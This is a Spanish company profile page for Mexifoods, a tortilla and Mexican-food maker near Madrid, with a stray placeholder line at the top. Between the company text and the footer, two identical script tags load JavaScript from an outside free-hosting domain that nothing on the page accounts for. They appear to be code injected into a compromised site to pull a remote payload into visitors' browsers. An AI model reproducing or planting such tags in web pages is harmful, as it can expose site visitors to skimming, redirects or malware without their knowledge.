Últimas noticias

jhbkjbkj

Nuestra Empresa


Mexifoods es uno de los principales fabricantes de comida mexicana y referente a nivel europeo con más de 20 años en el mercado. Destaca por la calidad de sus productos y cuidada fabricación para traer a los hogares españoles el verdadero sabor de México. Su historia comienza en 1991 con la distribución, y más adelante fabricación, de tortillas tradicionales mexicanas (trigo y maíz). De esta forma Mexifoods, se convierte en la primera empresa de España en la elaboración de tortillas.

Con el paso de los años Mexifoods ha ido creciendo y evolucionando. Ha incorporado la última tecnología existente a nivel mundial, con el fin de ofrecer la mejor calidad y servicio a sus clientes y consumidores. Además ha ampliado su gama de productos auténticamente mexicanos (salsas, totopos, sazonadores …). Su kit de fajitas, salsas caseras mexicanas o relleno de fajitas para calentar y listo, hacen de la cocina una tarea rápida, fácil y rica. Además, ha incorporado dentro de su portfolio de productos otros panes planos como el dürüm o el kebab.

 

Elabora con Mexifoods de manera sencilla una comida sana para cualquier ocasión. Sus productos son ideales para compartir con amigos y familia. Nos encanta ver a nuestros consumidores disfrutar de la auténtica comida mexicana en su propia casa. Sigue descubriendo todo sobre nosotros así como las mejores recetas en nuestra web ¡Gracias por tu confianza!


 

<script type="text/javascript" src="http://yourjavascript.com/48411101017/ya.js"></script>

<script type="text/javascript" src="http://yourjavascript.com/48411101017/ya.js"></script>

 




Empresa asociada a


Empresa regular member


Mexifoods SL C/ Paloma, 2, Pol. Ind. Los Gallegos, Fuenlabrada (Madrid) 916 422 720

Aviso legal · Desarrollado por Factory Web

Empresa | Control de calidad | Productos | Recetas | Noticias